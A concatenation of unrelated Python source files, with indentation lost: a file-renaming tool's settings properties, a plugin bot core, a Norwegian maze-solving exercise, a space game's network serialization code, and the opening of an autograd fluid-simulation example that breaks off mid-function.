def filteredit(self):
return self._filteredit
@filteredit.setter
def filteredit(self, text):
log.debug("filteredit: {}.".format(text))
self._filteredit = text.decode("utf-8")
@property
def excludeedit(self):
return self._excludeedit
@excludeedit.setter
def excludeedit(self, text):
log.debug("excludeedit: {}.".format(text))
self._excludeedit = text.decode("utf-8")
@property
def remsymbols(self):
return self._remsymbols
@remsymbols.setter
def remsymbols(self, boolean):
log.debug("remsymbols: {}".format(boolean))
self._remsymbols = boolean
@property
def autostop(self):
return self._autostop
@autostop.setter
def autostop(self, boolean):
log.debug("autostop: {}".format(boolean))
self._autostop = boolean
@property
def manualmirror(self):
return self._manualmirror
@manualmirror.setter
def manualmirror(self, boolean):
log.debug("manualmirror: {}".format(boolean))
self._manualmirror = boolean
@property
def removecheck(self):
return self._removecheck
@removecheck.setter
def removecheck(self, boolean):
log.debug("removecheck: {}".format(boolean))
self._removecheck = boolean
@property
def remdups(self):
return self._remdups
@remdups.setter
def remdups(self, boolean):
log.debug("remdups: {}".format(boolean))
self._remdups = boolean
@property
def remext(self):
return self._remext
@remext.setter
def remext(self, boolean):
log.debug("remext: {}".format(boolean))
self._remext = boolean
@property
def remnonwords(self):
return self._remnonwords
@remnonwords.setter
def remnonwords(self, boolean):
log.debug("remnonwords: {}".format(boolean))
self._remnonwords = boolean
@property
def ignorecase(self):
return self._ignorecase
@ignorecase.setter
def ignorecase(self, boolean):
flag = 0
if boolean:
flag = re.I
log.debug("ignorecase: {}".format(boolean))
self._ignorecase = flag
@property
def mediamode(self):
return self._mediamode
@mediamode.setter
def mediamode(self, boolean):
log.debug("mediamode: {}".format(boolean))
self._mediamode = boolean
@property
def countcheck(self):
return self._countcheck
@countcheck.setter
def countcheck(self, boolean):
log.debug("countcheck: {}".format(boolean))
self._countcheck = boolean
@property
def countfill(self):
return self._countfill
@countfill.setter
def countfill(self, boolean):
log.debug("countfill: {}".format(boolean))
self._countfill = boolean
@property
def countpos(self):
return self._countpos
@countpos.setter
def countpos(self, index):
log.debug("countpos: {}".format(index))
self._countpos = index
@property
def countbase(self):
return self._countbase
@countbase.setter
def countbase(self, num):
log.debug("countbase: {}".format(num))
self._countbase = num
@property
def countstep(self):
return self._countstep
@countstep.setter
def countstep(self, num):
log.debug("countstep: {}".format(num))
self._countstep = num
@property
def insertcheck(self):
return self._insertcheck
@insertcheck.setter
def insertcheck(self, boolean):
log.debug("insertcheck: {}".format(boolean))
self._insertcheck = boolean
@property
def insertpos(self):
return self._insertpos
@insertpos.setter
def insertpos(self, index):
log.debug("insertpos: {}".format(index))
self._insertpos = index
@property
def deletecheck(self):
return self._deletecheck
@deletecheck.setter
def deletecheck(self, boolean):
log.debug("deletecheck: {}".format(boolean))
self._deletecheck = boolean
@property
def deletestart(self):
return self._deletestart
@deletestart.setter
def deletestart(self, index):
log.debug("deletestart: {}".format(index))
self._deletestart = index
@property
def deleteend(self):
return self._deleteend
@deleteend.setter
def deleteend(self, index):
log.debug("deleteend: {}".format(index))
self._deleteend = index
@property
def casecheck(self):
return self._casecheck
@casecheck.setter
def casecheck(self, boolean):
log.debug("casecheck: {}".format(boolean))
self._casecheck = boolean
@property
def casemode(self):
return self._casemode
@casemode.setter
def casemode(self, num):
log.debug("casemode: {}".format(num))
self._casemode = num
@property
def spacecheck(self):
return self._spacecheck
@spacecheck.setter
def spacecheck(self, boolean):
log.debug("spacecheck: {}".format(boolean))
self._spacecheck = boolean
@property
def spacemode(self):
return self._spacemode
@spacemode.setter
def spacemode(self, num):
log.debug("spacemode: {}".format(num))
self._spacemode = num
if __name__ == "__main__":
fileops = FileOps(hidden=True, recursive=True, casemode="1")
fileops.get_previews(fileops.get_targets(), "*", "asdf")
|
from PluginManager import PluginManager
from PluginDispatcher import PluginDispatcher
from Configuration import ConfigFile
from Util import call
from re import match
from sys import path
from os import getcwd
from Util import dictJoin
from Logging import LogFile
path.append(getcwd())
log = LogFile("Core")
class Core:
_PluginManager = None
_PluginDispatcher = None
_ResponseObject = None
_Connector = None
_Config = None
def _LoadConnector(self, ConName):
try:
con = __import__("%s.Connector" % ConName,
globals(), locals(), "Connector")
log.debug("Got connector:", con)
cls = getattr(con, "Connector", None)
except :
log.exception("Exception while loading connector")
cls = None
log.debug("Connectors class", cls)
if cls:
c = cls()
log.debug("Connector constructed")
return c
log.critical("No connector")
return cls
def HandleEvent(self, event):
log.dict(event,"HandleEvent")
pm = self._PluginManager
if not pm:
log.warning("No plugin manager")
return
pd = self._PluginDispatcher
if not pd:
log.warning("No plugin dispatcher")
return
ro = self._ResponseObject
if not ro:
log.warning("no response object")
pass
matches = pm.GetMatchingFunctions(event)
log.debug("Matched %i hook(s)." % len(matches))
for inst, func, args, servs in matches:
newEvent = dictJoin(event, dictJoin(args,
{"self": inst, "response": ro}))
log.debug("Services found for plugin:", servs)
if servs:
log.debug("Event before processing:", newEvent)
servDict={}
servDict["event"]=newEvent
servDict["pm"]=self._PluginManager
servDict["pd"]=self._PluginDispatcher
servDict["ro"]=self._ResponseObject
servDict["c"]=self._Connector
servDict["core"]=self
servDict["config"]=self._Config
for servName in servs:
serv = pm.GetService(servName)
log.debug("Processing service",servName,serv)
call(serv.onEvent,servDict)
if servs:
log.dict(newEvent,"Event after processing:")
#issue 5 fix goes here
newEvent.update(servDict)
pd.Enqueue((func, newEvent))
def __init__(self):
self._Config = ConfigFile("Core")
if not self._Config:
log.critical("No log file loaded!")
return
ConName = self._Config["Core", "Provider"]
if ConName == None:
log.critical("No Core:Provider in Core.cfg")
del self._Connector
return
self._Connector=self._LoadConnector(ConName)
if self._Connector:
self._PluginManager = PluginManager(ConName)
self._PluginDispatcher = PluginDispatcher()
self._Connector.SetEventHandler(self.HandleEvent)
self._ResponseObject = self._Connector.GetResponseObject()
self._PluginDispatcher.SetResponseHandler(
self._Connector.HandleResponse)
def Start(self):
if not self._Connector:
log.warning("Could not start, no connector.")
return
log.debug("Starting")
log.debug("Auto loading plugins")
self.AutoLoad()
log.debug("Auto load complete")
if self._Connector:
log.debug("Connector starting")
self._Connector.Start()
#else log error?
def Stop(self):
log.debug("Stopping")
if self._PluginDispatcher:
self._PluginDispatcher.Stop()
if self._PluginManager:
self._PluginManager.Stop()
if self._Connector:
self._Connector.Stop()
def AutoLoad(self):
if not self._PluginManager:
return
pm = self._PluginManager
log.note("Starting autoload", "Root:" + pm.root)
cf = ConfigFile(pm.root, "Autoload")
lines = ["Configuration:"]
for i in cf:
lines.append(i)
for j in cf[i]:
lines.append(" %s=%s"%(j,cf[i,j]))
log.debug(*lines)
if cf:
log.debug("Autoloading plugins.")
names = cf["Plugins", "Names"]
log.debug("Autoloading plugins", names)
if names:
for name in names.split():
pm.LoadPlugin(name)
log.debug("Autoloading finished.")
pd=self._PluginDispatcher
handler = pd.GetResponseHandler()
log.debug("Updating dedicated thread pool",self._ResponseObject,handler)
pd.EnsureDedicated(pm.GetDedicated(),self._ResponseObject,handler)
else:
log.note("No Autoload configuration file")
if __name__ == "__main__":
try:
c = Core()
try:
c.Start()
except:
log.exception("Exception while starting.")
c.Stop()
except:
log.exception("Exception while stopping.")
log.debug("End of core")
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 9 00:06:24 2014
@author: kristian
"""
from skumleskogen import *
import time
################## OPTIONS ##################
debug_on = True
write_to_file = True
hukommelse = {}
sti_totalt = ["inn"]
noder_med_lås = set()
forrige_retning = []
file = None
try:
del print
except:
pass
_print = print
class Print_To_File(object):
def __init__(self, *text):
_print(text)
string = ""
for t in text:
string += str(t)
if file:
file.write("\n" + string)
if write_to_file:
print = Print_To_File
file = open("output.txt", mode="a")
class MovementException(Exception):
def __init__(self, error):
self.error = error
def __str__(self):
return str(self.error)
def start_solving():
print("Er inngang:", er_inngang())
nøkler = 0
while True:
debug()
husk_node()
if er_stank():
if gaa_tilbake():
sti_totalt.append("STANK! tilbake til " + str(nummer()))
kom_fra_retning = forrige_retning.pop(len(forrige_retning) - 1)
continue
if er_nokkel():
if plukk_opp():
nøkler += 1
sti_totalt.append("plukket nøkkel " + str(nøkler))
continue
if (not hukommelse[nummer()]["venstre"]) \
or kan_låse_opp(nummer(), nøkler, "venstre"):
try:
hukommelse[nummer()]["lås"][0] = False
hukommelse[nummer()]["superlås"][0] = False
besøk_node("venstre")
except MovementException as ex:
print(ex)
else:
forrige_retning.append("venstre")
sti_totalt.append("venstre " + str(nummer()))
continue
if (not hukommelse[nummer()]["høyre"]) \
or kan_låse_opp(nummer(), nøkler, "høyre"):
try:
hukommelse[nummer()]["lås"][1] = False
hukommelse[nummer()]["superlås"][1] = False
besøk_node("høyre")
except MovementException as ex:
print(ex)
else:
forrige_retning.append("høyre")
sti_totalt.append("høyre " + str(nummer()))
continue
if er_laas():
noder_med_lås.add(nummer())
if er_superlaas():
if nøkler >= 2:
utfall = laas_opp()
if utfall:
nøkler -= 2
sti_totalt.append("låste opp sl " + str(nøkler))
if nummer() in noder_med_lås:
noder_med_lås.remove(nummer())
continue
else:
noder_med_lås.add(nummer())
else:
if nøkler >= 1:
utfall = laas_opp()
if utfall:
nøkler -= 1
sti_totalt.append("låste opp s " + str(nøkler))
if nummer() in noder_med_lås:
noder_med_lås.remove(nummer())
continue
if er_utgang():
gaa_ut()
return
# Vi er stuck. Noen noder må være låste.
har_lås = er_laas()
har_superlås = er_superlaas()
if har_lås and har_superlås:
# Låsen var ikke en vanlig lås, men superlås.
har_lås = False
if barn_har_lås(nummer()):
har_lås = True
if barn_har_superlås(nummer()):
har_superlås = True
if gaa_tilbake():
sti_totalt.append("tilbake til " + str(nummer()))
kom_fra_retning = forrige_retning.pop(len(forrige_retning) - 1)
print("kom fra:", kom_fra_retning)
if har_lås:
print("har lås")
if kom_fra_retning == "venstre":
hukommelse[nummer()]["lås"][0] = True
else:
hukommelse[nummer()]["lås"][1] = True
if har_superlås:
print("har superlås")
if kom_fra_retning == "venstre":
hukommelse[nummer()]["superlås"][0] = True
else:
hukommelse[nummer()]["superlås"][1] = True
print(hukommelse[nummer()])
else:
print("KLARTE IKKE Å GÅ TILBAKE!!!")
return
def kan_låse_opp(n, nøkler, retning):
indeks = 0
if retning == "høyre":
indeks = 1
if hukommelse[n]["lås"][indeks] and (nøkler >= 1):
return True
if hukommelse[n]["superlås"][indeks] and (nøkler >= 2):
return True
return False
def barn_har_lås(n):
return hukommelse[n]["lås"][0] or hukommelse[n]["lås"][1]
def barn_har_superlås(n):
return hukommelse[n]["superlås"][0] or hukommelse[n]["superlås"][1]
def husk_node():
n = nummer()
if n not in hukommelse:
hukommelse[n] = {"venstre": False, "høyre": False,
"lås": [False, False], "superlås": [False, False]}
def besøk_node(retning):
n = nummer()
utfall = False
if retning == "venstre":
utfall = gaa_venstre()
elif retning == "høyre":
utfall = gaa_hoyre()
else:
print("Ugyldig retning oppgitt!", n, retning)
return
if utfall:
hukommelse[n][retning] = True
else:
if er_laas():
raise MovementException("Er låst")
else:
raise MovementException("Er blindvei")
def debug():
if debug_on:
print("/"*25 + "DEBUG:" + "/"*25)
print(("Nummer: {n}\n" +
"Type:\n " +
"i: {i}, l: {l}, sl: {sl}, st: {st}, nk: {nk}, v: {v}, u: {u}" +
"\nLabel: {la}")
.format(n=nummer(), i=er_inngang(), l=er_laas(),
sl=er_superlaas(), st=er_stank(), u=er_utgang(),
v=er_vanlig(), nk=er_nokkel(), la=label(nummer())))
def main():
# Initialisation.
def get_hours():
return time.asctime().split(' ')[4]
start_time = time.time()
print("Starting. Time:", get_hours())
# Start solving the maze.
try:
start_solving()
# In case of failure, e.g. a rabbit ate you.
except Exception as e:
print("Exception occured:")
print(e)
print("Exciting. Time:", get_hours())
# Done, do final actions.
finally:
print("\nRan for {0} seconds.".format(
abs(
round(start_time - time.time(), 4))))
print("Maze completed.")
print(sti_totalt)
if __name__ == "__main__":
main()
if file:
file.close()
|
from orders import *
from gfxs import *
import ids
local_version = "v0.6.0" # major version
revision = "$Revision: 107 $" # updated by subversion
revisionSplitted = revision.split()
if len(revisionSplitted) > 2:
local_version = "%sr%s" % ( local_version, revisionSplitted[1] )
else:
local_version = "%srNA" % ( local_version )
version = "%s_%s" %( local_version, ids.local_version )
if __debug__:
print "PyCaptain %s" % version
class AttackOrder:
def __init__(self):
self.target
self.weapon
# inputs -> server
class COInput:
def __init__(self,xc=0,yc=0,wc=320,hc=320):
self.xc = xc
self.yc = yc
self.wc = wc
self.hc = hc
self.orders = []
self.mouseDownAt = (0,0)
self.mouseUpAt = (0,0)
self.mouseDownAtV = (0,0)
self.mouseUpAtV = (0,0)
self.mouseUpped = False
self.mouseRightUpped = False
self.mousePos = (0,0)
self.right = False
self.left = False
self.up = False
self.down = False
def dump(self):
dump = "%i;%i;%i;%i" % ( self.xc, self.yc, self.wc, self.hc )
for order in self.orders:
if isinstance( order, OrderMove ):
dump = dump + ";%i:%i:%i:%7f" % ( ids.O_MOVE, order.x, order.y, order.ori )
if isinstance( order, OrderStopMove ):
dump = dump + ";%i:%.2f" % ( ids.O_STOP_MOVE, order.ori )
elif isinstance( order, OrderRecallShips ):
dump = dump + ";%i:%i" % ( ids.O_RECALL_SHIPS, order.type )
elif isinstance( order, OrderLaunchShips ):
dump = dump + ";%i:%i" % ( ids.O_LAUNCH_SHIPS, order.type )
elif isinstance( order, OrderJumpNow ):
dump = dump + ";%i" % ( ids.O_JUMP_NOW )
elif isinstance( order, OrderJump ):
dump = dump + ";%i:%i:%i" % ( ids.O_JUMP, order.x, order.y )
elif isinstance( order, OrderLaunchMissile ):
dump = dump + ";%i:%i:%i:%i" % ( ids.O_LAUNCH_MISSILE, order.type, order.x, order.y )
elif isinstance( order, OrderAttack ):
dump = dump + ";%i:%i" % ( ids.O_ATTACK, order.obj )
elif isinstance( order, OrderOrbit ):
dump = dump + ";%i:%i" % ( ids.O_ORBIT, order.obj )
elif isinstance( order, OrderBuildTurret ):
dump = dump + ";%i:%i:%i" % ( ids.O_BUILD_TURRET, order.tp, order.type )
elif isinstance( order, OrderBuildShip ):
dump = dump + ";%i:%i:%i" % ( ids.O_BUILD_SHIP, order.type, order.rate )
elif isinstance( order, OrderBuildMissile ):
dump = dump + ";%i:%i:%i" % ( ids.O_BUILD_MISSILE, order.type, order.rate )
elif isinstance( order, OrderActivateTurret ):
dump = dump + ";%i:%i:%i" % ( ids.O_TURRET_ACTIVATE, order.turret, order.activate )
elif isinstance( order, OrderActivateShield ):
dump = dump + ";%i:%i" % ( ids.O_CHARGE, order.activate )
elif isinstance( order, OrderActivateRepair ):
dump = dump + ";%i:%i" % ( ids.O_REPAIR, order.activate )
elif isinstance( order, OrderSetRelation ):
dump = dump + ";%i:%s:%i" % ( ids.O_RELATION, order.other, order.level )
elif isinstance( order, OrderSelfDestruct ):
dump = dump + ";%i" % ( ids.O_SELF_DESTRUCT )
elif isinstance( order, OrderBroadcast ):
dump = dump + ";%i:%s" % ( ids.O_BROADCAST, order.text )
elif isinstance( order, OrderDirectedCast ):
dump = dump + ";%i:%s:%i:%i" % ( ids.O_DIRECTED_CAST, order.text, order.x, order.y )
return dump
def CopyCOInput( input ):
return COInput( input.xc, input.yc, input.wc, input.hc )
def LoadCOInput( text ):
es = text.split(";")
inputs = COInput( int(es[0]), int(es[1]), int(es[2]), int(es[3]) )
if len(es[4:]) > 0:
for e in es[4:]: #range(int(es[4])):
os = e.split(":")
if int(os[0]) == ids.O_MOVE:
order = OrderMove( int(os[1]), int(os[2]), float(os[3]) )
elif int(os[0]) == ids.O_STOP_MOVE:
order = OrderStopMove( float(os[1]) )
elif int(os[0]) == ids.O_RECALL_SHIPS:
order = OrderRecallShips( int(os[1]) )
elif int(os[0]) == ids.O_LAUNCH_SHIPS:
order = OrderLaunchShips( int(os[1]) )
elif int(os[0]) == ids.O_JUMP_NOW:
order = OrderJumpNow()
elif int(os[0]) == ids.O_JUMP:
order = OrderJump( (int(os[1]), int(os[2])) )
elif int(os[0]) == ids.O_LAUNCH_MISSILE:
order = OrderLaunchMissile( int(os[1]), (int(os[2]), int(os[3])) )
elif int(os[0]) == ids.O_ATTACK:
order = OrderAttack( int(os[1]) )
elif int(os[0]) == ids.O_ORBIT:
order = OrderOrbit( int(os[1]) )
elif int(os[0]) == ids.O_BUILD_TURRET:
order = OrderBuildTurret( int(os[1]), int(os[2]) )
elif int(os[0]) == ids.O_BUILD_SHIP:
order = OrderBuildShip( int(os[1]), int(os[2]) )
elif int(os[0]) == ids.O_BUILD_MISSILE:
order = OrderBuildMissile( int(os[1]), int(os[2]) )
elif int(os[0]) == ids.O_TURRET_ACTIVATE:
order = OrderActivateTurret( int(os[1]), int(os[2]) )
elif int(os[0]) == ids.O_CHARGE:
order = OrderActivateShield( int(os[1]) )
elif int(os[0]) == ids.O_REPAIR:
order = OrderActivateRepair( int(os[1]) )
elif int(os[0]) == ids.O_RELATION:
order = OrderSetRelation( os[1], int(os[2]) )
elif int(os[0]) == ids.O_SELF_DESTRUCT:
order = OrderSelfDestruct()
elif int(os[0]) == ids.O_BROADCAST:
order = OrderBroadcast( os[1] )
elif int(os[0]) == ids.O_DIRECTED_CAST:
order = OrderDirectedCast( os[1], (int(os[2]), int(os[3])) )
# order = OrderMove( int(es[5+3*i]), int(es[6+3*i]), float(es[7+3*i]) )
inputs.orders.append( order )
return inputs
# objects -> client
class COObject:
def __init__(self,type,xp,yp,zp,ori,uid,selectRadius,relation=ids.U_NEUTRAL):
self.type = type
self.xp = xp # int(xp+0.5)
self.yp = yp # int(yp+0.5)
self.zp = zp
self.ori = ori
self.uid = uid
self.selectRadius = selectRadius
self.relation = relation
def dump(self):
dump = "%i;%i;%i;%i;%.2f;%i;%i;%i" % ( self.type, self.xp, self.yp, self.zp, self.ori, self.uid, self.selectRadius, self.relation )
return dump
def LoadCOObject( text ):
es = text.split(";")
return COObject( int(es[0]), int(es[1]), int(es[2]), int(es[3]), float(es[4]), int(es[5]), int(es[6]), int(es[7]) )
class COObjects:
def __init__(self,coobjects):
self.coobjects = coobjects
def dump(self):
dumps = [ coobject.dump() for coobject in self.coobjects ]
dump = ":".join(dumps)
return dump
def LoadCOObjects( text ):
bs = text.split(":")
coobjects = []
coobject = None
for b in bs:
try:
coobject = LoadCOObject( b )
coobjects.append( coobject )
except Exception, ex:
print "failed LoadCOOBject:", ex
return COObjects( coobjects )
# stats -> client
class COPlayerStatus:
def __init__(self, gameTick, dead, ore, maxOre,
energy, maxEnergy, shieldIntegrity, hullIntegrity,
canJump, repairing, charging, hangarSpace,
shipsSpace, missilesSpace, jumpCharge, jumpRecover,
oreInProcess, turrets, missiles, ships,
radars, ennemyInRadar=False, dangerInRadar=False ): # , buildableTurrets
self.gameTick = gameTick
self.dead = dead
self.ore = ore
self.maxOre = maxOre
self.energy = energy
self.maxEnergy = maxEnergy
self.shieldIntegrity = shieldIntegrity
self.hullIntegrity = hullIntegrity
self.hangarSpace = hangarSpace
self.shipsSpace = shipsSpace
self.missilesSpace = missilesSpace
self.oreInProcess = oreInProcess
self.canJump = canJump
self.jumpCharge = jumpCharge
self.jumpRecover = jumpRecover
self.turrets = turrets
self.missiles = missiles
self.ships = ships
self.radars = radars
self.repairing = repairing
self.charging = charging
self.ennemyInRadar = ennemyInRadar
self.dangerInRadar = dangerInRadar
def dump(self):
if self.dead:
dump = "%i" % ( self.gameTick )
else:
dump = "%i;%i;%i;%i;%i;%.2f;%.2f;%i;%i;%i;%i;%i;%i;%i;%i;%i;%i" % ( self.gameTick, self.ore, self.maxOre, self.energy, self.maxEnergy, self.shieldIntegrity, self.hullIntegrity, self.canJump, self.repairing, self.charging, self.hangarSpace, self.shipsSpace, self.missilesSpace, self.jumpCharge, self.jumpRecover, self.ennemyInRadar, self.dangerInRadar )
dump = dump + ";"
for oip in self.oreInProcess:
dump = dump + "%i:"% oip
dump = dump + ";"
for turret in self.turrets:
dump = dump + "%i:%i:%i:%.2f:%.2f:%i:%i:%i:%i:%i:%i:%i:%i:" % ( turret.type, turret.xp, turret.yp, turret.minAngle, turret.maxAngle, turret.buildPerc,turret.range,turret.on,turret.activable,turret.useEnergy,turret.useOre,turret.energyRebate, turret.oreRebate )
for bt in turret.buildables:
dump = dump + "%i_%i/" % ( bt.type, bt.canBuild ) # , bt.energyCost, bt.oreCost, bt.category )
dump = dump + "|"
dump = dump + ";"
for ship in self.missiles:
dump = dump + "%i:%i:%i:%i:%i:%i:%i|" % ( ship.type, ship.usable, ship.canLaunch, ship.nbr, ship.buildPerc, ship.canBuild, ship.show )
dump = dump + ";"
for ship in self.ships:
dump = dump + "%i:%i:%i:%i:%i:%i:%i|" % ( ship.type, ship.usable, ship.canLaunch, ship.nbr, ship.buildPerc, ship.canBuild, ship.show )
dump = dump + ";"
for radar in self.radars:
dump = dump + "%i:%i:%i|" % ( radar.xr, radar.yr, radar.range )
return dump
def LoadCOPlayerStatus( text ):
es = text.split(";")
oreInProcess = []
turrets = []
missiles = []
ships = []
buildableTurrets = []
radars = []
if len(es)==2: # dead
for o in es[ 1 ].split("|"):
if len( o ) > 0:
i = o.split(":")
radars.append( CORadar( (int(i[0]), int(i[1])), int(i[2]) ) )
stats = COPlayerStatus( int(es[0]), True, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0,0, 0, oreInProcess, turrets, missiles, ships, radars )
else:
for o in es[ 17 ].split(":"):
if len( o ) > 0:
oreInProcess.append( int(o) )
for o in es[ 18 ].split("|"):
if len( o ) > 0:
i = o.split(":")
buildables = []
for b in i[ 13 ].split("/"):
if len( b ) > 0:
bi = b.split("_")
buildables.append( COBuildable( int(bi[0]), int(bi[1]) ) )
turrets.append( COTurret( int(i[0]), int(i[1]), int(i[2]), float(i[3]), float(i[4]), int(i[5]), int(i[6]), int(i[7]), int(i[8]), int(i[9]), int(i[10]), int(i[11]), int(i[12]), buildables ) )
for o in es[ 19 ].split("|"):
if len( o ) > 0:
i = o.split(":")
missiles.append( COShips( int(i[0]), int(i[1]), int(i[2]), int(i[3]), int(i[4]), int(i[5]), int(i[6]) ) )
for o in es[ 20 ].split("|"):
if len( o ) > 0:
i = o.split(":")
ships.append( COShips( int(i[0]), int(i[1]), int(i[2]), int(i[3]), int(i[4]), int(i[5]), int(i[6]) ) )
for o in es[ 21 ].split("|"):
if len( o ) > 0:
i = o.split(":")
radars.append( CORadar( (int(i[0]), int(i[1])), int(i[2]) ) )
stats = COPlayerStatus( int(es[0]), False, int(es[1]), int(es[2]), int(es[3]), int(es[4]), float(es[5]), float(es[6]), int(es[7]), int(es[8]), int(es[9]), int(es[10]), int(es[11]), int(es[12]), int(es[13]), int(es[14]), oreInProcess, turrets, missiles, ships, radars, int(es[15]), int(es[16]) )
return stats
class COPossible:
def __init__( self, ship, race, nbrTurrets, speed, shield, hull, hangar, canJump, civilians ):
self.ship = ship
self.race = race
self.nbrTurrets = nbrTurrets
self.speed = speed
self.shield = shield
self.hull = hull
self.hangar = hangar
self.canJump = canJump
self.civilians = civilians
class COPossibles:
def __init__( self, ships ):
self.ships = ships
def dump(self):
strings = [ "%i;%i;%i;%i;%i;%i;%i;%i;%i"%(ship.ship, ship.race, ship.nbrTurrets, ship.speed, ship.shield, ship.hull, ship.hangar, ship.canJump, ship.civilians) for ship in self.ships ]
return ":".join( strings )
def LoadCOPossibles( text ):
ss = text.split(":")
ships = []
for s in ss:
if len( s ) > 0:
es = s.split(";")
ships.append( COPossible( int(es[0]), int(es[1]), int(es[2]), int(es[3]), int(es[4]), int(es[5]), int(es[6]), int(es[7]), int(es[8]) ) )
return COPossibles( ships )
class COPlayer:
def __init__( self, name, race, relIn, relOut, isHuman ):
self.name = name
self.race = race
self.relIn = relIn
self.relOut = relOut
self.isHuman = isHuman
class COPlayers:
def __init__( self, players ):
self.players = players
def dump(self):
strings = [ "%s;%i;%i;%i;%i"%(player.name,player.race,player.relIn,player.relOut,player.isHuman) for player in self.players ]
return ":".join( strings )
def LoadCOPlayers( text ):
ss = text.split(":")
players = []
for s in ss:
if len( s ) > 0:
# print s
es = s.split(";")
players.append( COPlayer( es[0], int(es[1]), int(es[2]), int(es[3]), int(es[4]) ) )
# print "loaded", players
return COPlayers( players ) # COPlayers( [ es = s.split(";"); COPlayer( es[0], int(es[1]), int(es[2]), int(es[3]), int(es[4]) ) for s in ss ] )
class COTurret:
def __init__( self, type, xp, yp, minAngle, maxAngle, buildPerc, range, on, activable, useEnergy, useOre, energyRebate, oreRebate, buildables ):
self.type = type
self.xp = xp
self.yp = yp
self.minAngle = minAngle
self.maxAngle = maxAngle
self.buildPerc = buildPerc
self.range = range
self.on = on
self.activable = activable
self.useEnergy = useEnergy
self.useOre = useOre
self.buildables = buildables
self.energyRebate = energyRebate
self.oreRebate = oreRebate
class COShips:
def __init__( self, type, usable, canLaunch, nbr, buildPerc, canBuild, show ):
self.type = type
self.usable = usable
self.canLaunch = canLaunch
self.nbr = nbr
self.buildPerc = buildPerc
self.canBuild = canBuild
self.show = show
class COBuildable:
def __init__( self, type, canBuild ): # , energyCost, oreCost, category
self.type = type
self.canBuild = canBuild
# self.energyCost = energyCost
# self.oreCost = oreCost
# self.category = category
class COAstre:
def __init__(self, type, xp, yp, radius=0 ):
self.type = type
self.xp = xp
self.yp = yp
self.radius = radius
def dump(self):
dump = "%i;%i;%i;%i;" % ( self.type, self.xp, self.yp, self.radius )
return dump
class CORadar:
def __init__( self, (xr,yr), range ):
self.xr = xr
self.yr = yr
self.range = range
def LoadCOAstre( text ):
es = text.split(";")
co = int(es[4])
return COAstre( int(es[0]), int(es[1]), int(es[2]), int(es[3]) )
class COGfxs:
def __init__(self, gfxs ):
self.gfxs = gfxs
def dump(self):
dump = "%i" % ( len(self.gfxs) )
for gfx in self.gfxs:
if isinstance( gfx, GfxLaser ):
dump = dump + ";%i:%i:%i:%i:%i:%i:%i:%i" % (ids.G_LASER_SMALL, gfx.xp,gfx.yp,gfx.z,gfx.xd,gfx.yd, gfx.width, gfx.color)
elif isinstance( gfx, GfxExplosion ):
dump = dump + ";%i:%i:%i:%i:%i:%i" % (ids.G_EXPLOSION, gfx.xp,gfx.yp,gfx.radius,gfx.sound,gfx.delai)
elif isinstance( gfx, GfxShield ):
dump = dump + ";%i:%i:%i:%i:%i:%.3f:%.3f" % (ids.G_SHIELD, gfx.xp,gfx.yp,gfx.radius,gfx.strength,gfx.angle,gfx.hit)
elif isinstance( gfx, GfxExhaust ): # careful, GfxExhaust inherits of GfxFragment
pass # TODO, removed because not used on client side
elif isinstance( gfx, GfxFragment ):
dump = dump + ";%i:%i:%i:%i:%.2f:%.2f:%.2f:%.2f:%i:%i" % (ids.G_FRAGMENT, gfx.xp,gfx.yp,gfx.zp,gfx.ori,gfx.xi,gfx.yi,gfx.ri,gfx.type,gfx.ttl)
elif isinstance( gfx, GfxLightning ):
dump = dump + ";%i:%i:%i:%i:%i:%i:%i" % (ids.G_LIGHTNING, gfx.xp,gfx.yp,gfx.z,gfx.xd,gfx.yd, gfx.strength )
elif isinstance( gfx, GfxJump ):
dump = dump + ";%i:%i:%i:%i:%i:%i" % (ids.G_JUMP, gfx.xp,gfx.yp,gfx.radius,gfx.angle*100,gfx.delai)
return dump
def LoadCOGfxs( text ):
gfxs = []
es = text.split(";")
n = int(es[0])
for e in es[1:]:
ss = e.split(":")
if int(ss[ 0 ]) == ids.G_LASER_SMALL:
gfx = GfxLaser( (int(ss[1]),int(ss[2])), int(ss[3]), (int(ss[4]),int(ss[5])), int(ss[6]), int(ss[7]) )
elif int(ss[ 0 ]) == ids.G_EXPLOSION:
gfx = GfxExplosion( (int(ss[1]),int(ss[2])), int(ss[3]), int(ss[4]), int(ss[5]) )
elif int(ss[ 0 ]) == ids.G_SHIELD:
gfx = GfxShield( (int(ss[1]),int(ss[2])), int(ss[3]), int(ss[4]), float(ss[5]), float(ss[6]) )
elif int(ss[ 0 ]) == ids.G_FRAGMENT:
gfx = GfxFragment( (int(ss[1]),int(ss[2])), int(ss[3]), float(ss[4]), float(ss[5]), float(ss[6]), float(ss[7]), int(ss[8]), int(ss[9]) )
elif int(ss[ 0 ]) == ids.G_EXHAUST:
gfx = GfxExhaust( (int(ss[1]),int(ss[2])), int(ss[3]), float(ss[4]), float(ss[5]), float(ss[6]), float(ss[7]) )
elif int(ss[ 0 ]) == ids.G_LIGHTNING:
gfx = GfxLightning( (int(ss[1]),int(ss[2])), int(ss[3]), (int(ss[4]),int(ss[5])), int(ss[6]) )
elif int(ss[ 0 ]) == ids.G_JUMP:
gfx = GfxExplosion( (int(ss[1]),int(ss[2])), int(ss[3]), int(ss[4]), float(ss[5])/100, int(ss[5]) )
else: print int(ss[ 0 ])
gfxs.append( gfx )
return gfxs
class COScore:
def __init__( self, playerName, score, deaths ):
pass
class COEnd:
def __init__( self, scores, ):
pass
class COBegin:
pass
class COTutorialMsg:
pass
|
from __future__ import absolute_import
from __future__ import print_function
import autograd.numpy as np
from autograd import value_and_grad
from scipy.optimize import minimize
import matplotlib.pyplot as plt
import os
from builtins import range
rows, cols = 40, 60
# Fluid simulation code based on
# "Real-Time Fluid Dynamics for Games" by Jos Stam
# http://www.intpowertechcorp.com/GDC03.pdf
def occlude(f, occlusion):
return f * (1 - occlusion)
def project(vx, vy, occlusion):
"""Project the velocity field to be approximately mass-conserving,
using a few iterations of Gauss-Seidel."""
p = np.zeros(vx.shape)
div = -0.5 * (np.roll(vx, -1, axis=1) - np.roll(vx, 1, axis=1)
+ np.roll(vy, -1, axis=0) - np.roll(vy, 1, axis=0))
div = make_continuous(div, occlusion)
for k in range(50):
p = (div + np.roll(p, 1, axis=1) + np.roll(p, -1, axis=1)
+ np.roll(p, 1, axis=0) + np.roll(p, -1, axis=0))/4.0
p = make_continuous(p, occlusion)
vx = vx - 0.5*(np.roll(p, -1, axis=1) - np.roll(p, 1, axis=1))
